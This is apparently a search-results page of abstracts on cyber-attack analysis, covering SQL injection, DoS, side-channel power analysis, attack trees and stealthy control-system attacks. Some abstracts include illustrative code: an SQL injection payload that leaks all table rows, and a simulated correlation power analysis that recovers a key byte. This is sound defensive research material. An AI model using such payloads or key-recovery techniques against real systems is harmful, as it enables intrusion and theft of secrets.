WorldWideScience

Sample records for attack methodology analysis

  1. Attack Methodology Analysis: Emerging Trends in Computer-Based Attack Methodologies and Their Applicability to Control System Networks

    Energy Technology Data Exchange (ETDEWEB)

    Bri Rolston

    2005-06-01

    Threat characterization is a key component in evaluating the threat faced by control systems. Without a thorough understanding of the threat faced by critical infrastructure networks, adequate resources cannot be allocated or directed effectively to the defense of these systems. Traditional methods of threat analysis focus on identifying the capabilities and motivations of a specific attacker, assessing the value the adversary would place on targeted systems, and deploying defenses according to the threat posed by the potential adversary. However, too many effective exploits and tools are freely available to anyone with an Internet connection, minimal technical skill, and a modest motivational threshold for the field of potential adversaries to be narrowed effectively. Understanding how hackers evaluate new IT security research and incorporate significant new ideas into their own tools provides a means of anticipating how IT systems are most likely to be attacked in the future. This research, Attack Methodology Analysis (AMA), could supply pertinent information on how to detect and stop new types of attacks. Since the exploit methodologies and attack vectors developed in the general Information Technology (IT) arena can be converted for use against control system environments, assessing areas in which cutting-edge exploit development and remediation techniques are occurring can provide significant intelligence for control system network exploitation and defense, and a means of assessing threat without identifying the specific capabilities of individual opponents. Attack Methodology Analysis begins with the study of what exploit technology and attack methodologies are being developed in the Information Technology (IT) security research community, both black hat and white hat. Once a solid understanding of the cutting-edge security research is established, emerging trends in attack methodology can be identified and the gap between

  2. Attack Methodology Analysis: SQL Injection Attacks and Their Applicability to Control Systems

    Energy Technology Data Exchange (ETDEWEB)

    Bri Rolston

    2005-09-01

    Database applications have become a core component in control systems and their associated record keeping utilities. Traditional security models attempt to secure systems by isolating core software components and concentrating security efforts against threats specific to those computers or software components. Database security within control systems follows these models by using generally independent systems that rely on one another for proper functionality. The high level of reliance between the two systems creates an expanded threat surface. To understand the scope of a threat surface, all segments of the control system, with an emphasis on entry points, must be examined. The communication link between data and decision layers is the primary attack surface for SQL injection. This paper facilitates understanding what SQL injection is and why it is a significant threat to control system environments.
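
    As a concrete illustration of the injection pattern discussed above (a generic sketch, not code from the report), the snippet below contrasts a string-concatenated query with a parameterized one, using Python's standard sqlite3 module and an invented `tag_history` table standing in for a control-system historian.

    ```python
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tag_history (tag TEXT, value REAL)")
    conn.execute("INSERT INTO tag_history VALUES ('FLOW_01', 42.0)")

    user_input = "FLOW_01' OR '1'='1"   # attacker-controlled string from the decision layer

    # Vulnerable: the input is pasted into the SQL text, so the quote breaks out
    # of the string literal and the OR clause matches every row.
    vulnerable = f"SELECT * FROM tag_history WHERE tag = '{user_input}'"
    print(conn.execute(vulnerable).fetchall())            # leaks all rows

    # Safer: a parameterized query keeps the input as data, never as SQL syntax.
    safe = "SELECT * FROM tag_history WHERE tag = ?"
    print(conn.execute(safe, (user_input,)).fetchall())   # returns nothing
    ```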

  3. Bluetooth security attacks: comparative analysis, attacks, and countermeasures

    CERN Document Server

    Haataja, Keijo; Pasanen, Sanna; Toivanen, Pekka

    2013-01-01

    This overview of Bluetooth security examines network vulnerabilities and offers a comparative analysis of recent security attacks. It also examines related countermeasures and proposes a novel attack that works against all existing Bluetooth versions.

  4. Methodological Naturalism Under Attack | Ruse | South African ...

    African Journals Online (AJOL)

    Recently the Intelligent Design movement has been arguing against methodological naturalism, and in this project they have been joined by the Christian philosopher Alvin Plantinga. In this paper I examine Plantinga's arguments and conclude not only that they are not well taken, but that he does no good service to his ...

  5. An Analysis of Attacks on Blockchain Consensus

    OpenAIRE

    Bissias, George; Levine, Brian Neil; Ozisik, A. Pinar; Andresen, Gavin

    2016-01-01

    We present and validate a novel mathematical model of the blockchain mining process and use it to conduct an economic evaluation of the double-spend attack, which is fundamental to all blockchain systems. Our analysis focuses on the value of transactions that can be secured under a conventional double-spend attack, both with and without a concurrent eclipse attack. Our model quantifies the importance of several factors that determine the attack's success, including confirmation depth, attacke...

  6. Managing Complex Battlespace Environments Using Attack the Network Methodologies

    DEFF Research Database (Denmark)

    Mitchell, Dr. William L.

    This paper examines the last 8 years of development and application of Attack the Network (AtN) intelligence methodologies for creating shared situational understanding of complex battlespace environments and the development of deliberate targeting frameworks. It presents a short history of their development and how they are integrated into operational planning through strategies of deliberate targeting for modern operations. The paper draws on experience and case studies from Iraq, Syria, and Afghanistan and offers some lessons learned, as well as insight into the future of these methodologies, including their possible application at a national security level for managing longer strategic endeavors.

  7. Attack Graph Construction for Security Events Analysis

    Directory of Open Access Journals (Sweden)

    Andrey Alexeevich Chechulin

    2014-09-01

    The paper is devoted to investigation of the attack graph construction and analysis task for network security evaluation and real-time security event processing. The main object of this research is the attack modeling process. The paper contains a description of the attack graph building, modification and analysis technique, as well as an overview of the implemented prototype for network security analysis based on the attack graph approach.
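
    A minimal sketch of the general idea (not the prototype described in the paper): hosts and privilege levels as graph nodes, exploitable transitions as edges, and attack paths enumerated from an entry point to a target asset with networkx. All hosts and exploit labels are invented.

    ```python
    import networkx as nx

    # Hypothetical network: nodes are (host, privilege) states, edges are exploit steps.
    G = nx.DiGraph()
    G.add_edge("internet", "web_srv:user", exploit="CVE-A (web app RCE)")
    G.add_edge("web_srv:user", "web_srv:root", exploit="CVE-B (local privesc)")
    G.add_edge("web_srv:root", "db_srv:admin", exploit="reused credentials")
    G.add_edge("internet", "vpn_gw:user", exploit="weak VPN password")
    G.add_edge("vpn_gw:user", "db_srv:admin", exploit="CVE-C (DB service bug)")

    # Enumerate every attack path from the attacker's entry point to the asset.
    for path in nx.all_simple_paths(G, "internet", "db_srv:admin"):
        steps = [G.edges[u, v]["exploit"] for u, v in zip(path, path[1:])]
        print(" -> ".join(path), "|", "; ".join(steps))
    ```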

  8. Pragmatism attacking Christianity as weakness – Methodologies of targeting

    Directory of Open Access Journals (Sweden)

    J.J. (Ponti) Venter

    2013-08-01

    The central argument is that methods are designed with aims in mind, and are determined by one’s worldview and/or ontology and/or philosophical anthropology and/or views of scholarship. It is possible, and here shown by analysis of the methodology of William James, that obsession with a cause, driven by the elitist belief that my cause is for everybody’s advantage, can take an ideological format (a formalistic ideology), in which case it would show tendencies to polarise. In the case of James, the scientistic methodology takes as its primary target Christianity’s meekness and kindness as humanitarianly ineffective. But James suffers from the problem of intellectual solipsism: reading Christianity via abstract rationalist theology.

  9. Counteracting Power Analysis Attacks by Masking

    Science.gov (United States)

    Oswald, Elisabeth; Mangard, Stefan

    The publication of power analysis attacks [12] has triggered a great deal of research activity. On the one hand, these activities have been dedicated to the development of secure and efficient countermeasures. On the other hand, new and improved attacks have also been developed. In fact, there has been a continuous arms race between designers of countermeasures and attackers. This chapter provides a brief overview of the state of the art in this arms race in the context of a countermeasure called masking. Masking is a popular countermeasure that has been extensively discussed in the scientific community. Numerous articles have been published that explain different types of masking and that analyze weaknesses of this countermeasure.
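
    As a concrete illustration of the countermeasure (the textbook first-order Boolean masking by table recomputation, not necessarily the exact schemes analyzed in the chapter), the sketch below looks up a substitution table without ever handling the unmasked intermediate value.

    ```python
    import random
    import secrets

    SBOX = list(range(256))                 # stand-in for the AES S-box
    random.shuffle(SBOX)

    def masked_sbox_lookup(x_masked, m_in, m_out):
        """Return SBOX[x] ^ m_out given only x ^ m_in, never the raw x."""
        # Recompute a masked table S'(u) = S(u ^ m_in) ^ m_out for the current masks.
        table = [SBOX[u ^ m_in] ^ m_out for u in range(256)]
        return table[x_masked]

    x = 0x3A
    m_in, m_out = secrets.randbelow(256), secrets.randbelow(256)
    y_masked = masked_sbox_lookup(x ^ m_in, m_in, m_out)
    assert y_masked ^ m_out == SBOX[x]      # unmasking recovers the true output
    ```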

  10. Cyberprints: Identifying Cyber Attackers by Feature Analysis

    Science.gov (United States)

    Blakely, Benjamin A.

    2012-01-01

    The problem of attributing cyber attacks is one of increasing importance. Without a solid method of demonstrating the origin of a cyber attack, any attempts to deter would-be cyber attackers are wasted. Existing methods of attribution make unfounded assumptions about the environment in which they will operate: omniscience (the ability to gather,…

  11. Regional Shelter Analysis Methodology

    Energy Technology Data Exchange (ETDEWEB)

    Dillon, Michael B. [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States); Dennison, Deborah [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States); Kane, Jave [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States); Walker, Hoyt [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States); Miller, Paul [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States)

    2015-08-01

    The fallout from a nuclear explosion has the potential to injure or kill 100,000 or more people through exposure to external gamma (fallout) radiation. Existing buildings can reduce radiation exposure by placing material between fallout particles and exposed people. Lawrence Livermore National Laboratory was tasked with developing an operationally feasible methodology that could improve fallout casualty estimates. The methodology, called a Regional Shelter Analysis, combines the fallout protection that existing buildings provide civilian populations with the distribution of people in various locations. The Regional Shelter Analysis method allows the consideration of (a) multiple building types and locations within buildings, (b) country specific estimates, (c) population posture (e.g., unwarned vs. minimally warned), and (d) the time of day (e.g., night vs. day). The protection estimates can be combined with fallout predictions (or measurements) to (a) provide a more accurate assessment of exposure and injury and (b) evaluate the effectiveness of various casualty mitigation strategies. This report describes the Regional Shelter Analysis methodology, highlights key operational aspects (including demonstrating that the methodology is compatible with current tools), illustrates how to implement the methodology, and provides suggestions for future work.
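
    A toy population-weighted calculation in the spirit of the methodology (the building categories, protection factors, and doses below are invented for illustration, not values from the report): the sketch combines a shelter distribution with per-category protection factors to estimate an average dose.

    ```python
    # (population fraction, protection factor); dose inside = outdoor dose / PF
    shelters = {
        "outdoors":        (0.05, 1),
        "wood-frame home": (0.55, 3),
        "brick low-rise":  (0.30, 10),
        "large concrete":  (0.10, 40),
    }
    outdoor_dose = 4.0   # hypothetical unsheltered fallout dose (Gy)

    avg_dose = sum(frac * outdoor_dose / pf for frac, pf in shelters.values())
    print(f"population-averaged dose: {avg_dose:.2f} Gy "
          f"(vs {outdoor_dose:.1f} Gy unsheltered)")
    ```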

  12. Denial of Service Attack Techniques: Analysis, Implementation and Comparison

    Directory of Open Access Journals (Sweden)

    Khaled Elleithy

    2005-02-01

    A denial of service attack (DOS) is any type of attack on a networking structure intended to disable a server from servicing its clients. Attacks range from sending millions of requests to a server in an attempt to slow it down, to flooding a server with large packets of invalid data, to sending requests with an invalid or spoofed IP address. In this paper we show the implementation and analysis of three main types of attack: Ping of Death, TCP SYN Flood, and Distributed DOS. The Ping of Death attack will be simulated against a Microsoft Windows 95 computer. The TCP SYN Flood attack will be simulated against a Microsoft Windows 2000 IIS FTP Server. Distributed DOS will be demonstrated by simulating a distributed zombie program that carries out the Ping of Death attack. This paper will demonstrate the potential damage from DOS attacks and analyze the ramifications of the damage.
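
    A back-of-the-envelope model of the SYN flood mechanism mentioned above (parameter values are illustrative, not measurements from the paper): each spoofed SYN occupies a backlog slot until it times out, so the backlog saturates once the SYN rate times the timeout exceeds its size.

    ```python
    backlog_size = 1024      # server's half-open connection backlog (illustrative)
    syn_timeout = 30.0       # seconds a half-open connection is retained

    def half_open_entries(syn_rate_per_s):
        return syn_rate_per_s * syn_timeout   # steady-state occupancy

    for rate in (10, 40, 100):
        occ = half_open_entries(rate)
        status = "saturated - new clients refused" if occ >= backlog_size else "ok"
        print(f"{rate:>4} SYN/s -> ~{occ:.0f} half-open entries ({status})")
    ```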

  13. SMART performance analysis methodology

    International Nuclear Information System (INIS)

    Lim, H. S.; Kim, H. C.; Lee, D. J.

    2001-04-01

    To ensure the required and desired operation over the plant lifetime, the performance analysis for the SMART NSSS design is done by means of the specified analysis methodologies for the performance related design basis events (PRDBEs). A PRDBE is an occurrence (event) that shall be accommodated in the design of the plant and whose consequence would be no more severe than the normal service effects of the plant equipment. The performance analysis methodology which systematizes the methods and procedures to analyze the PRDBEs is as follows. Based on the operation mode suitable to the characteristics of the SMART NSSS, the corresponding PRDBEs and the allowable range of process parameters for these events are deduced. With the developed control logic for each operation mode, the system thermal hydraulics are analyzed for the chosen PRDBEs using the system analysis code. In particular, because the system characteristics of SMART differ from those of existing commercial nuclear power plants, the operation mode, PRDBEs, control logic, and analysis code should be consistent with the SMART design. This report presents the categories of the PRDBEs chosen based on each operation mode, the transitions among these, and the acceptance criteria for each PRDBE. It also includes the analysis methods and procedures for each PRDBE and the concept of the control logic for each operation mode. Therefore this report, in which the overall details for SMART performance analysis are specified based on the current SMART design, can be utilized as a guide for the detailed performance analysis.

  14. Attack tree based cyber security analysis of nuclear digital instrumentation and control systems

    International Nuclear Information System (INIS)

    Khand, P.A.

    2009-01-01

    To maintain the cyber security, nuclear digital Instrumentation and Control (I and C) systems must be analyzed for security risks because a single security breach due to a cyber attack can cause system failure, which can have catastrophic consequences on the environment and staff of a Nuclear Power Plant (NPP). Attack trees have been widely used to analyze the cyber security of digital systems due to their ability to capture system specific as well as attacker specific details. Therefore, a methodology based on attack trees has been proposed to analyze the cyber security of the systems. The methodology has been applied for the Cyber Security Analysis (CSA) of a Bistable Processor (BP) of a Reactor Protection System (RPS). Threats have been described according to their source. Attack scenarios have been generated using the attack tree and possible counter measures according to the Security Risk Level (SRL) of each scenario have been suggested. Moreover, cyber Security Requirements (SRs) have been elicited, and suitability of the requirements has been checked. (author)
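
    To make the formalism concrete, the sketch below evaluates a tiny AND/OR attack tree under an independence assumption; the tree structure and probabilities are invented for illustration and are not the BP/RPS tree from the paper.

    ```python
    # A node is either a leaf probability or ("AND"|"OR", [children]).
    # Assuming independent events: AND multiplies, OR combines as 1 - prod(1 - p).
    def p_success(node):
        if isinstance(node, (int, float)):
            return float(node)
        op, children = node
        ps = [p_success(c) for c in children]
        prod = 1.0
        if op == "AND":
            for p in ps:
                prod *= p
            return prod
        for p in ps:
            prod *= (1.0 - p)
        return 1.0 - prod

    compromise_bp = ("OR", [
        ("AND", [0.3, 0.5]),   # e.g. phish an engineer AND pivot to the maintenance PC
        0.05,                  # e.g. direct access to an exposed interface
    ])
    print(f"P(root scenario succeeds) = {p_success(compromise_bp):.3f}")
    ```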

  15. Cyber attack analysis on cyber-physical systems: Detectability, severity, and attenuation strategy

    Science.gov (United States)

    Kwon, Cheolhyeon

    Security of Cyber-Physical Systems (CPS) against malicious cyber attacks is an important yet challenging problem. Since most cyber attacks happen in erratic ways, it is usually intractable to describe and diagnose them systematically. Motivated by such difficulties, this thesis presents a set of theories and algorithms for a cyber-secure architecture of the CPS within the control theoretic perspective. Here, instead of identifying a specific cyber attack model, we are focused on analyzing the system's response during cyber attacks. Firstly, we investigate the detectability of the cyber attacks from the system's behavior under cyber attacks. Specifically, we conduct a study on the vulnerabilities in the CPS's monitoring system against the stealthy cyber attack that is carefully designed to avoid being detected by its detection scheme. After classifying three kinds of cyber attacks according to the attacker's ability to compromise the system, we derive the necessary and sufficient conditions under which such stealthy cyber attacks can be designed to cause the unbounded estimation error while not being detected. Then, the analytical design method of the optimal stealthy cyber attack that maximizes the estimation error is developed. The proposed stealthy cyber attack analysis is demonstrated with illustrative examples on Air Traffic Control (ATC) system and Unmanned Aerial Vehicle (UAV) navigation system applications. Secondly, in an attempt to study the CPSs' vulnerabilities in more detail, we further discuss a methodology to identify potential cyber threats inherent in the given CPSs and quantify the attack severity accordingly. We then develop an analytical algorithm to test the behavior of the CPS under various cyber attack combinations. Compared to a numerical approach, the analytical algorithm enables the prediction of the most effective cyber attack combinations without computing the severity of all possible attack combinations, thereby greatly reducing the
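
    A small numerical sketch of the detectability question (a generic constant-velocity model with a chi-square innovation test and invented parameters, not the ATC/UAV models from the thesis): a slowly ramping sensor bias is largely absorbed by the filter, so alarms stay rare while the estimation error grows.

    ```python
    import numpy as np

    np.random.seed(1)
    A = np.array([[1.0, 1.0], [0.0, 1.0]])          # position/velocity model
    C = np.array([[1.0, 0.0]])
    Q, R = 0.01 * np.eye(2), np.array([[0.25]])

    x, xh, P = np.zeros(2), np.zeros(2), np.eye(2)
    for k in range(300):
        x = A @ x + np.random.multivariate_normal([0, 0], Q)
        bias = 0.02 * (k - 150) if k > 150 else 0.0  # stealthy ramp injection
        y = C @ x + np.random.normal(0.0, 0.5, 1) + bias
        xh, P = A @ xh, A @ P @ A.T + Q              # Kalman predict
        S = C @ P @ C.T + R
        r = y - C @ xh                               # innovation (residual)
        g2 = float(r @ np.linalg.inv(S) @ r)         # chi-square detector statistic
        K = P @ C.T @ np.linalg.inv(S)
        xh, P = xh + K @ r, (np.eye(2) - K @ C) @ P  # Kalman update
        if g2 > 10.83:                               # ~99.9% threshold, 1 dof
            print(f"k={k}: alarm (g2={g2:.1f})")
    print(f"final position estimation error: {abs(x[0] - xh[0]):.2f}")
    ```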

  16. A Strategic Analysis of Information Sharing Among Cyber Attackers

    Directory of Open Access Journals (Sweden)

    Kjell Hausken

    2015-10-01

    Full Text Available We build a game theory model where the market design is such that one firm invests in security to defend against cyber attacks by two hackers. The firm has an asset, which is allocated between the three market participants dependent on their contest success. Each hacker chooses an optimal attack, and they share information with each other about the firm’s vulnerabilities. Each hacker prefers to receive information, but delivering information gives competitive advantage to the other hacker. We find that each hacker’s attack and information sharing are strategic complements while one hacker’s attack and the other hacker’s information sharing are strategic substitutes. As the firm’s unit defense cost increases, the attack is inverse U-shaped and reaches zero, while the firm’s defense and profit decrease, and the hackers’ information sharing and profit increase. The firm’s profit increases in the hackers’ unit cost of attack, while the hackers’ information sharing and profit decrease. Our analysis also reveals the interesting result that the cumulative attack level of the hackers is not affected by the effectiveness of information sharing between them and moreover, is also unaffected by the intensity of joint information sharing. We also find that as the effectiveness of information sharing between hackers increases relative to the investment in attack, the firm’s investment in cyber security defense and profit are constant, the hackers’ investments in attacks decrease, and information sharing levels and hacker profits increase. In contrast, as the intensity of joint information sharing increases, while the firm’s investment in cyber security defense and profit remain constant, the hackers’ investments in attacks increase, and the hackers’ information sharing levels and profits decrease. Increasing the firm’s asset causes all the variables to increase linearly, except information sharing which is constant. We extend

  17. Automatic analysis of attack data from distributed honeypot network

    Science.gov (United States)

    Safarik, Jakub; Voznak, Miroslav; Rezac, Filip; Partila, Pavol; Tomala, Karel

    2013-05-01

    There are many ways of getting real data about malicious activity in a network. One of them relies on masquerading monitoring servers as production ones. These servers are called honeypots, and data about attacks on them brings us valuable information about actual attacks and the techniques used by hackers. The article describes a distributed topology of honeypots, which was developed with a strong orientation toward monitoring of IP telephony traffic. IP telephony servers can be easily exposed to various types of attacks, and without protection this situation can lead to loss of money and other unpleasant consequences. Using a distributed topology with honeypots placed in different geographical locations and networks provides more valuable and independent results. With an automatic system for gathering information from all honeypots, it is possible to work with all the information at one centralized point. Communication between the honeypots and the centralized data store uses secure SSH tunnels, and the server communicates only with authorized honeypots. The centralized server also automatically analyses the data from each honeypot. The results of this analysis, as well as other statistical data about malicious activity, are easily accessible through a built-in web server. All statistical and analysis reports serve as the information basis for an algorithm that classifies the different types of VoIP attacks used. The web interface then provides a tool for quick comparison and evaluation of actual attacks in all monitored networks. The article describes both the honeypot nodes in the distributed architecture, which monitor suspicious activity, and the methods and algorithms used on the server side for analysis of the gathered data.

  18. Trace Chemical Analysis Methodology

    Science.gov (United States)

    1980-04-01

    [Fragmentary OCR of the report's figure list and body text; the recoverable items are the figure captions "Modified DR/2 spectrophotometer face" and "Colorimetric oil analysis field test kit", and a remark that computer-assisted pattern recognition is perhaps the most promising application of pattern recognition techniques for this research effort.]

  19. A video-polygraphic analysis of the cataplectic attack

    DEFF Research Database (Denmark)

    Rubboli, G; d'Orsi, G; Zaniboni, A

    2000-01-01

    OBJECTIVES AND METHODS: To perform a video-polygraphic analysis of 11 cataplectic attacks in a 39-year-old narcoleptic patient, correlating clinical manifestations with polygraphic findings. Polygraphic recordings monitored EEG and EMG activity from several cranial, trunk, and upper and lower limb muscles ... of REM sleep and neural structures subserving postural control.

  20. Fire safety analysis: methodology

    International Nuclear Information System (INIS)

    Kazarians, M.

    1998-01-01

    From a review of the fires that have occurred in nuclear power plants and the results of fire risk studies that have been completed over the last 17 years, we can conclude that internal fires in nuclear power plants can be an important contributor to plant risk. Methods and data are available to quantify the fire risk. These methods and data have been subjected to a series of reviews and detailed scrutiny and have been applied to a large number of plants. There is no doubt that we do not know everything about fire and its impact on nuclear power plants. However, this lack of knowledge or uncertainty can be quantified and can be used in the decision-making process. In other words, the methods entail uncertainties and limitations that are not insurmountable, and there is little or no basis for the results of a fire risk analysis to fail to support a decision process.

  1. METHODOLOGICAL ELEMENTS OF SITUATIONAL ANALYSIS

    Directory of Open Access Journals (Sweden)

    Tetyana KOVALCHUK

    2016-07-01

    The article deals with the investigation of the theoretical and methodological principles of situational analysis. The necessity of situational analysis under modern conditions is proved, and the notion of “situational analysis” is defined. We conclude that situational analysis is a continuous system study whose purpose is to identify signs of a dangerous situation, to evaluate such signs comprehensively as influenced by a system of objective and subjective factors, to search for motivated targeted actions used to eliminate adverse effects of the system's exposure to the situation now and in the future, and to develop the managerial actions needed to bring the system back to normal. A methodological approach to situational analysis is developed, its goal is substantiated, and the expediency of diagnostic, evaluative and searching functions in the process of situational analysis is proved. The basic methodological elements of situational analysis are grounded. The substantiation of the principal methodological elements of system analysis will enable the analyst to develop adaptive methods able to take into account the peculiar features of a unique object, namely a situation that has emerged in a complex system, to diagnose such a situation and subject it to systematic and in-depth analysis, to identify risks and opportunities, and to make timely management decisions as required by a particular period.

  2. Performance Improvement of Power Analysis Attacks on AES with Encryption-Related Signals

    Science.gov (United States)

    Lee, You-Seok; Lee, Young-Jun; Han, Dong-Guk; Kim, Ho-Won; Kim, Hyoung-Nam

    A power analysis attack is a well-known side-channel attack, but the efficiency of the attack is frequently degraded by the existence of power components irrelevant to the encryption in the signals used for the attack. To enhance the performance of the power analysis attack, we propose a preprocessing method based on extracting encryption-related parts from the measured power signals. Experimental results show that attacks with the preprocessed signals detect correct keys with far fewer signals, compared to conventional power analysis attacks.
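
    For context, the sketch below runs a standard correlation power analysis (CPA) key-byte recovery on simulated traces, the kind of baseline attack whose signal-to-noise ratio the proposed preprocessing improves; the leakage model, S-box stand-in, and noise level are assumptions, not the paper's measurements.

    ```python
    import numpy as np

    rng = np.random.default_rng(0)
    SBOX = rng.permutation(256)                  # stand-in for the AES S-box
    HW = np.array([bin(v).count("1") for v in range(256)])

    # Simulated traces: power ~ Hamming weight of SBOX[pt ^ key] plus noise.
    true_key, n_traces = 0x5A, 500
    pts = rng.integers(0, 256, n_traces)
    traces = HW[SBOX[pts ^ true_key]] + rng.normal(0.0, 1.0, n_traces)

    # CPA: correlate the measured power with the leakage predicted for each guess.
    def corr(a, b):
        return abs(np.corrcoef(a, b)[0, 1])

    scores = [corr(traces, HW[SBOX[pts ^ guess]]) for guess in range(256)]
    print(f"recovered key byte: {int(np.argmax(scores)):#04x}")   # expect 0x5a
    ```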

  3. Nonlinear analysis of NPP safety against the aircraft attack

    International Nuclear Information System (INIS)

    Králik, Juraj; Králik, Juraj

    2016-01-01

    The paper presents the nonlinear probabilistic analysis of the reinforced concrete buildings of a nuclear power plant under aircraft attack. The dynamic load is defined in time on the basis of airplane impact simulations considering the real stiffness, masses, direction and velocity of the flight. The dynamic response is calculated in the ANSYS system using the transient nonlinear analysis solution method. The damage of the concrete wall is evaluated in accordance with the NDRC standard, considering the spalling, scabbing and perforation effects. The simple and detailed calculations of the wall damage are compared.

  4. Nonlinear analysis of NPP safety against the aircraft attack

    Energy Technology Data Exchange (ETDEWEB)

    Králik, Juraj, E-mail: juraj.kralik@stuba.sk [Faculty of Civil Engineering, STU in Bratislava, Radlinského 11, 813 68 Bratislava (Slovakia); Králik, Juraj, E-mail: kralik@fa.stuba.sk [Faculty of Architecture, STU in Bratislava, Námestie Slobody 19, 812 45 Bratislava (Slovakia)

    2016-06-08

    The paper presents the nonlinear probabilistic analysis of the reinforced concrete buildings of a nuclear power plant under aircraft attack. The dynamic load is defined in time on the basis of airplane impact simulations considering the real stiffness, masses, direction and velocity of the flight. The dynamic response is calculated in the ANSYS system using the transient nonlinear analysis solution method. The damage of the concrete wall is evaluated in accordance with the NDRC standard, considering the spalling, scabbing and perforation effects. The simple and detailed calculations of the wall damage are compared.

  5. A Proposal for a Methodology to Develop a Cyber-Attack Penetration Test Scenario Including NPPs Safety

    Energy Technology Data Exchange (ETDEWEB)

    Lee, In Hyo [KAIST, Daejeon (Korea, Republic of); Son, Han Seong [Joongbu Univ., Geumsan (Korea, Republic of); Kim, Si Won [Korea Institute of Nuclear Nonproliferation and Control, Daejeon (Korea, Republic of); Kang, Hyun Gook [Rensselaer Polytechnic Institute, Troy (United States)

    2016-10-15

    A penetration test is one method to evaluate the cyber security of NPPs, so this approach has been performed in some studies. Because those studies focused on vulnerability finding or test bed construction, a scenario-based approach was not taken. However, to test the cyber security of NPPs, a proper test scenario is needed. Ahn et al. developed cyber-attack scenarios, but those scenarios could not be applied in a penetration test because they were developed based on past incidents of NPPs induced by cyber-attack. That is, those scenarios only covered incidents that had happened before, so they could not cover other various scenarios and could not be reflected in a penetration test. In this study, a method to develop a cyber-attack penetration test scenario for NPPs, focused especially on the safety point of view, is suggested. To evaluate the cyber security of NPPs, a penetration test is one possible way, and a method to develop a penetration test scenario is explained here. In particular, the goal of the hacker is taken to be deterioration of nuclear fuel integrity. Accordingly, in the methodology, Level 1 PSA results are utilized to reflect plant safety in the security assessment. From the PSA results, basic events are post-processed and possible cyber-attacks are reviewed against vulnerabilities of the digital control system.

  6. A Proposal for a Methodology to Develop a Cyber-Attack Penetration Test Scenario Including NPPs Safety

    International Nuclear Information System (INIS)

    Lee, In Hyo; Son, Han Seong; Kim, Si Won; Kang, Hyun Gook

    2016-01-01

    A penetration test is one method to evaluate the cyber security of NPPs, so this approach has been performed in some studies. Because those studies focused on vulnerability finding or test bed construction, a scenario-based approach was not taken. However, to test the cyber security of NPPs, a proper test scenario is needed. Ahn et al. developed cyber-attack scenarios, but those scenarios could not be applied in a penetration test because they were developed based on past incidents of NPPs induced by cyber-attack. That is, those scenarios only covered incidents that had happened before, so they could not cover other various scenarios and could not be reflected in a penetration test. In this study, a method to develop a cyber-attack penetration test scenario for NPPs, focused especially on the safety point of view, is suggested. To evaluate the cyber security of NPPs, a penetration test is one possible way, and a method to develop a penetration test scenario is explained here. In particular, the goal of the hacker is taken to be deterioration of nuclear fuel integrity. Accordingly, in the methodology, Level 1 PSA results are utilized to reflect plant safety in the security assessment. From the PSA results, basic events are post-processed and possible cyber-attacks are reviewed against vulnerabilities of the digital control system.

  7. Stability Analysis of an Advanced Persistent Distributed Denial-of-Service Attack Dynamical Model

    Directory of Open Access Journals (Sweden)

    Chunming Zhang

    2018-01-01

    The advanced persistent distributed denial-of-service (APDDoS) attack is a fairly significant threat to cybersecurity. Formulating a mathematical model for accurate prediction of APDDoS attacks is important; however, the dynamical model of the APDDoS attack has barely been reported. This paper first proposes a novel dynamical model of the APDDoS attack to understand its mechanisms. Then, the attacked threshold of this model is calculated. The global stability of the attack-free and attacked equilibria is proved. The influences of the model’s parameters on the attacked equilibrium are discussed. Eventually, the main conclusions of the theoretical analysis are examined through computer simulations.
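
    The paper's exact compartments and parameters are not reproduced here; as a generic illustration of this kind of dynamical analysis, the sketch below integrates an SIR-style propagation model with scipy, where the attack-free equilibrium is stable when the infection-to-recovery ratio is below one.

    ```python
    import numpy as np
    from scipy.integrate import odeint

    beta, gamma = 0.35, 0.10     # infection and recovery rates (illustrative)

    def model(y, t):
        S, I, R = y              # susceptible, infected (bot), recovered/patched
        return [-beta * S * I, beta * S * I - gamma * I, gamma * I]

    t = np.linspace(0, 120, 600)
    S, I, R = odeint(model, [0.999, 0.001, 0.0], t).T
    print(f"peak infected fraction: {I.max():.2f} at t = {t[np.argmax(I)]:.0f}")
    # With beta/gamma < 1 the infected fraction decays and the attack-free
    # equilibrium is stable; here beta/gamma = 3.5, so an outbreak occurs.
    ```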

  8. Cyber Attacks During the War on Terrorism: A Predictive Analysis

    National Research Council Canada - National Science Library

    Vatis, Michael

    2001-01-01

    .... Just as the terrorist attacks of September 11, 2001 defied what many thought possible, cyber attacks could escalate in response to United States and allied retaliatory measures against the terrorists...

  9. An Explanation of Nakamoto's Analysis of Double-spend Attacks

    OpenAIRE

    Ozisik, A. Pinar; Levine, Brian Neil

    2017-01-01

    The fundamental attack against blockchain systems is the double-spend attack. In this tutorial, we provide a very detailed explanation of just one section of Satoshi Nakamoto's original paper where the attack's probability of success is stated. We show the derivation of the mathematics relied upon by Nakamoto to create a model of the attack. We also validate the model with a Monte Carlo simulation, and we determine which model component is not perfect.
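
    For reference, a sketch of the resulting catch-up probability as given in the Bitcoin whitepaper, checked with a small Monte Carlo run in the spirit of the abstract; this reproduces the well-known closed form rather than the tutorial's full derivation, and the Monte Carlo keeps Nakamoto's Poisson approximation of the attacker's head start.

    ```python
    import math
    import numpy as np

    def nakamoto_p(q, z):
        """P(double-spend succeeds) after z confirmations; q = attacker hashrate share."""
        p = 1.0 - q
        if q >= p:
            return 1.0
        lam = z * q / p
        return 1.0 - sum(
            math.exp(-lam) * lam ** k / math.factorial(k) * (1.0 - (q / p) ** (z - k))
            for k in range(z + 1)
        )

    def monte_carlo(q, z, trials=200_000, seed=0):
        p, rng = 1.0 - q, np.random.default_rng(seed)
        k = rng.poisson(z * q / p, trials)                        # attacker's head start
        return np.where(k >= z, 1.0, (q / p) ** (z - k)).mean()   # gambler's-ruin catch-up

    q, z = 0.10, 6
    print(f"closed form: {nakamoto_p(q, z):.5f}  monte carlo: {monte_carlo(q, z):.5f}")
    # Both are about 0.00024 for these parameters.
    ```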

  10. Quantitative Attack Tree Analysis via Priced Timed Automata

    NARCIS (Netherlands)

    Kumar, Rajesh; Ruijters, Enno Jozef Johannes; Stoelinga, Mariëlle Ida Antoinette; Sankaranarayanan, Sriram; Vicario, Enrico

    The success of a security attack crucially depends on the resources available to an attacker: time, budget, skill level, and risk appetite. Insight in these dependencies and the most vulnerable system parts is key to providing effective counter measures. This paper considers attack trees, one of the

  11. Modeling and Analysis of Information Attack in Computer Networks

